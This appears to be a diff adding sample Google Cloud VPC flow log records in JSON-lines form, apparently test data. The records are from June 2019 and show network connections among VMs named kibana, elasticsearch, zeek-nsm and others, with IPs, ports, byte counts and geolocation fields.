+{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"67.43.156.13","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"67.43.156.13","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.168.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"67.43.156.13","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"67.43.156.13","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"67.43.156.13","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"67.43.156.13","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznw","jsonPayload":{"bytes_sent":"175465","connection":{"dest_ip":"67.43.156.14","dest_port":53106,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"337","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo2","jsonPayload":{"bytes_sent":"1987804","connection":{"dest_ip":"67.43.156.13","dest_port":9243,"protocol":6,"src_ip":"10.49.136.133","src_port":52780},"dest_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"26428","reporter":"SRC","rtt_msec":"91","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzn9","jsonPayload":{"bytes_sent":"206824","connection":{"dest_ip":"10.87.40.76","dest_port":33532,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznh","jsonPayload":{"bytes_sent":"14287","connection":{"dest_ip":"10.87.40.76","dest_port":33858,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"80","reporter":"DEST","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzny","jsonPayload":{"bytes_sent":"59376","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"354","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.496238286Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzoe","jsonPayload":{"bytes_sent":"11214","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"120","reporter":"DEST","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznn","jsonPayload":{"bytes_sent":"1763338","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53106},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.401543207Z","packets_sent":"598","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.020290305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznl","jsonPayload":{"bytes_sent":"67239","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznv","jsonPayload":{"bytes_sent":"250327","connection":{"dest_ip":"10.87.40.76","dest_port":33558,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 